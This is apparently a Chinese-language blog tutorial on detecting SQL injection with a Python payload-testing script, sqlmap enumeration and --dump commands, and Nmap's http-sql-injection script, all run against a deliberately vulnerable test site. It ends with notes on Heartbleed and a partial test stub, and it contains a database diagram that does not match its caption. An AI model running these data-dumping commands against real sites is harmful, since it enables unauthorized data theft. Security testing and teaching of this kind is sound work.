Python工具檢測SQL注入漏洞

8 分鐘閱讀

SQL 注入攻擊是網站安全的一大威脅,攻擊者可藉此竊取敏感資料甚至控制整個資料函式庫。因此,及早發現並修復 SQL 注入漏洞至關重要。本文將介紹如何使用 Python 工具,包含自行撰寫的指令碼以及 SQLmap 和 Nmap 等知名工具,來有效檢測網站上的 SQL 注入漏洞,並進一步說明如何利用 Censys 搜尋引擎查詢存在 Heartbleed 漏洞的伺服器,以及如何分析和利用 OpenSSL 的 Heartbleed 漏洞。透過這些技術和工具,開發者和資安人員能更有效地防範 SQL 注入攻擊,保障網站和資料函式庫安全。

發現SQL漏洞的Python工具

在測試網站安全性時,SQL注入是一種常見的攻擊手段。Python提供了多種工具來檢測和利用SQL注入漏洞。本文將介紹如何使用Python工具來發現SQL漏洞。

使用Python指令碼檢測SQL注入漏洞

以下是一個Python指令碼,用於檢測目標網站的SQL注入漏洞。該指令碼讀取一個包含SQL注入攻擊向量的檔案,並將這些向量與原始URL結合,檢查伺服器的回應中是否存在特定的字串,以驗證漏洞。

程式碼實作

import requests

URL = 'http://testphp.vulnweb.com/listproducts.php?cat='
sql_payloads = []

with open('sql-attack-vector.txt', 'r') as filehandle:
    for line in filehandle:
        sql_payload = line[:-1]
        sql_payloads.append(sql_payload)

for payload in sql_payloads:
    print('Testing ' + URL + payload)
    response = requests.get(URL + payload)
    if 'mysql' in response.text.lower():
        print('Injectable MySQL detected, attack string: ' + payload)
    elif 'native client' in response.text.lower():
        print('Injectable MSSQL detected, attack string: ' + payload)
    elif 'syntax error' in response.text.lower():
        print('Injectable PostGRES detected, attack string: ' + payload)
    elif 'ORA' in response.text.lower():
        print('Injectable Oracle database detected, attack string: ' + payload)
    else:
        print('Payload ', payload, ' not injectable')

內容解密:

  1. 匯入requests函式庫:用於傳送HTTP請求。
  2. 定義URL和sql_payloads列表:URL是目標網站的地址,sql_payloads列表用於儲存SQL注入攻擊向量。
  3. 讀取SQL注入攻擊向量檔案:將檔案中的每一行讀入sql_payloads列表。
  4. 遍歷sql_payloads列表:對每個攻擊向量,傳送GET請求到目標URL,並檢查回應中是否存在特定的字串,以判斷是否存在SQL注入漏洞。
  5. 根據回應內容判斷資料函式庫型別:根據回應中的特定字串,判斷目標資料函式庫的型別(MySQL、MSSQL、PostGRES或Oracle)。

使用SQLmap檢測SQL注入漏洞

SQLmap是一款流行的開源工具,用於檢測和利用SQL注入漏洞。它支援多種資料函式庫,包括MySQL、SQL Server、Oracle和PostgreSQL。

SQLmap基本使用

  1. 安裝SQLmap:在Debian-based系統上,可以使用apt-get命令安裝SQLmap。
    $ sudo apt-get install sqlmap
  2. 檢視SQLmap幫助資訊:使用-h選項檢視SQLmap的幫助資訊。
    $ sqlmap -h

使用SQLmap檢測目標網站的SQL注入漏洞

  1. 掃描URL:使用-u引數指定目標URL。
    $ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1
  2. 列出資料函式庫資訊:使用--dbs選項列出目標網站使用的資料函式庫。
    $ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

內容解密:

  1. 掃描URL:SQLmap會自動檢測目標URL中的引數是否存在SQL注入漏洞。
  2. 列出資料函式庫資訊:一旦檢測到SQL注入漏洞,SQLmap可以列出目標網站使用的資料函式庫資訊。

SQL 資料函式庫漏洞掃描與防護技術深度解析

在現代網路安全領域中,SQL 資料函式庫的安全性是企業組織必須高度重視的課題。駭客透過 SQL 注入攻擊,不僅能竊取敏感資料,甚至可能完全控制資料函式庫系統,進而對企業造成不可挽回的損失。本文將探討 SQL 資料函式庫漏洞掃描的技術細節,並介紹兩款強大的工具:SQLmap 和 Nmap,協助讀者全面掌握 SQL 注入漏洞的檢測與防護方法。

使用 SQLmap 進行 SQL 注入漏洞檢測

SQLmap 是一款功能強大的開源工具,專門用於檢測和利用 SQL 注入漏洞。其工作原理是透過分析網頁應用程式的輸入引數,識別潛在的 SQL 注入點,並進一步提取資料函式庫中的敏感資訊。

步驟一:識別資料函式庫型別

首先,SQLmap 會嘗試識別目標網站所使用的資料函式庫型別。以下是一個典型的命令執行範例:

$ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1

執行後,SQLmap 會輸出目標網站的資料函式庫型別和其他相關資訊:

[20:39:20] [INFO] fetching database names
available databases [2]:
[*] acuart
[*] information_schema

步驟二:列出特定資料函式庫中的表格資訊

接下來,可以使用 -D 引數來指定資料函式庫名稱,並結合 --tables 選項來檢索該資料函式庫中的所有表格:

$ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D information_schema --tables

輸出結果如下:

Database: information_schema
[28 tables]
+
---
-
---
-
---
-
---
-
---
-
---
-
---
-
---
-
---
-
---
+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
....

步驟三:檢視特定表格的欄位資訊

進一步,可以使用 -T 引數來指定表格名稱,並結合 --columns 選項來檢索該表格中的所有欄位:

$ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D information_schema -T views --columns

輸出結果如下:

Database: information_schema
Table: views
[10 columns]
+
---
-
---
-
---
-
---
-
---
---
+
---
-
---
-
---
---
+
| Column | Type |
+
---
-
---
-
---
-
---
-
---
---
+
---
-
---
-
---
---
+
| CHARACTER_SET_CLIENT | varchar(32) |
| CHECK_OPTION | varchar(8) |
| COLLATION_CONNECTION | varchar(32) |
| DEFINER | varchar(77) |
| IS_UPDATABLE | varchar(3) |
| SECURITY_TYPE | varchar(7) |
| TABLE_CATALOG | varchar(512) |
| TABLE_NAME | varchar(64) |
| TABLE_SCHEMA | varchar(64) |
| VIEW_DEFINITION | longtext |
+
---
-
---
-
---
-
---
-
---
---
+
---
-
---
-
---
---
+

#### 內容解密:

此步驟展示瞭如何使用 SQLmap 檢視特定表格的欄位結構。透過 -T--columns 選項的結合使用,可以精確地取得目標表格的欄位名稱和資料型別。這對於進一步的資料提取和分析至關重要。

步驟四:匯出表格資料

最後,可以使用 --dump 選項來匯出特定表格中的所有資料:

$ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D information_schema -T engines --dump

#### 內容解密:

此命令示範瞭如何使用 SQLmap 匯出特定表格中的資料。透過 --dump 選項,可以將目標表格中的所有記錄匯出,為進一步的分析和利用提供了基礎。

使用 Nmap 進行 SQL 注入漏洞掃描

除了 SQLmap 外,Nmap 也提供了強大的 SQL 注入漏洞掃描功能。透過其內建的 http-sql-injection 指令碼,可以快速檢測目標網站是否存在 SQL 注入漏洞。

使用 http-sql-injection 指令碼

執行以下命令來啟動 http-sql-injection 指令碼:

$ nmap -sV --script=http-sql-injection <ip_address or domain>

如果目標網站存在 SQL 注入漏洞,Nmap 將輸出相關的漏洞資訊:

80/tcp open http nginx 1.4.1
|_http-server-header: nginx/1.4.1
| http-sql-injection:
| Possible sqli for queries:
| http://testphp.vulnweb.com/search.php?test=query%27%20OR%20sqlspider
| http://testphp.vulnweb.com/search.php?test=query%27%20OR%20sqlspider
| http://testphp.vulnweb.com/AJAX/../showimage.php?file=%27%20OR%20sqlspider

#### 內容解密:

Nmap 的 http-sql-injection 指令碼能夠自動檢測目標網站的 SQL 注入漏洞。透過分析 HTTP 請求引數,該指令碼可以識別潛在的注入點,並提供詳細的漏洞資訊,有助於進一步的安全評估和修復工作。

測試 Heartbleed 和 SSL/TLS 漏洞

在前面的章節中,我們已經檢視了主要的工具,用於檢測 SQL 注入漏洞,例如 sqlmapnmaphttp-sql-injection 指令碼。這些工具能夠簡單地自動化檢測此類別漏洞的過程,這些漏洞存在於網站使用的引數中,並且可以被攻擊者輕易利用。

SSL/TLS 加密協定中的漏洞

SSL/TLS 加密提供了網路應用程式、電子郵件通訊和虛擬私人網路(VPN)之間的通訊安全和隱私。例如,SSL 版本 2.0 包含大量缺陷,可以利用特定的漏洞和技術進行攻擊。以下是一些值得注意的例子:

  • BEAST(瀏覽器對抗 SSL 和 TLS 的攻擊):這種攻擊利用了使用者端嘗試使用 SSL/TLS 協定安全連線到伺服器時所使用的加密演算法。
  • BREACH(透過適應性壓縮的瀏覽器偵察和洩露):這種攻擊利用了 HTTP 等級的不同壓縮技術來提取使用 HTTPS 協定加密的資料,例如與會話令牌相關的資訊。
  • FREAK(對 RSA-EXPORT 金鑰的分解攻擊):這種攻擊利用了 SSL/TLS 協定某些實作中的漏洞,允許攻擊者降級協定使用的加密。攻擊者可以利用此漏洞取得或修改透過 SSL/TLS 通訊通道傳輸的儲存資料。
  • 不安全的 TLS 重新協商:這種攻擊涉及執行中間人攻擊,以重新協商與伺服器的登入,從而取得會話握手。
  • POODLE(Padding Oracle On Demanded Legacy Encryption):這是一種根據中間人攻擊,旨在攔截透過 SSLV3 協定的加密連線。
  • Heartbleed:這是一種攻擊,其目的是利用特定版本的 OpenSSL 密碼學函式庫中的漏洞。此漏洞允許取得與某個時刻儲存在記憶體中的加密金鑰和使用者憑據相關的資訊。

使用 Censys 搜尋引擎尋找易受攻擊的伺服器

我們可以使用 Censys 搜尋引擎(https://censys.io)來尋找網際網路上的主機和伺服器的資訊。例如,我們可以使用此工具來識別由於 OpenSSL 版本易受攻擊而可能存在 Heartbleed 漏洞的伺服器。

圖表說明:Censys 對 OpenSSL 1.0.1 查詢的結果

@startuml
skinparam backgroundColor #FEFEFE
skinparam componentStyle rectangle

title Python工具檢測SQL注入漏洞

package "資料庫架構" {
    package "應用層" {
        component [連線池] as pool
        component [ORM 框架] as orm
    }

    package "資料庫引擎" {
        component [查詢解析器] as parser
        component [優化器] as optimizer
        component [執行引擎] as executor
    }

    package "儲存層" {
        database [主資料庫] as master
        database [讀取副本] as replica
        database [快取層] as cache
    }
}

pool --> orm : 管理連線
orm --> parser : SQL 查詢
parser --> optimizer : 解析樹
optimizer --> executor : 執行計畫
executor --> master : 寫入操作
executor --> replica : 讀取操作
cache --> executor : 快取命中

master --> replica : 資料同步

note right of cache
  Redis/Memcached
  減少資料庫負載
end note

@enduml

分析和利用 Heartbleed 漏洞(OpenSSL CVE-2014-0160)

Heartbleed(https://heartbleed.com)是一個在 OpenSSL 的兩個特定版本(1.0.1 和 1.0.2-beta)中發現的漏洞,允許攻擊者存取被攻擊的網路伺服器的一小部分記憶體(64 KB)。此外,從安全形度來看,攻擊者可以隨時重複此攻擊而不會被偵測。

程式碼範例:測試 Heartbleed 漏洞

def main():
    opts, args = options.parse_args()
    if len(args) < 1:
        options.print_help()
        return
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print('正在連線...')
    sys.stdout.flush()
    s.connect((args[0], opts.port))
    # ...(省略其他程式碼)

#### 內容解密:

此段程式碼定義了一個 main 函式,用於解析命令列引數並建立一個 socket 連線到指定的伺服器和埠號。主要步驟包括:

  1. 解析命令列引數。
  2. 如果沒有提供必要的引數,則顯示幫助資訊並傳回。
  3. 建立一個 socket 物件,並連線到指定的伺服器和埠號。

這段程式碼是測試 Heartbleed 漏洞的工具的一部分,用於建立與目標伺服器的連線,並為後續的漏洞測試做好準備。

玄貓 BlackCat

玄貓 BlackCat

技術愛好者,專注於分享程式開發、雲端技術與 AI 應用的心得體會。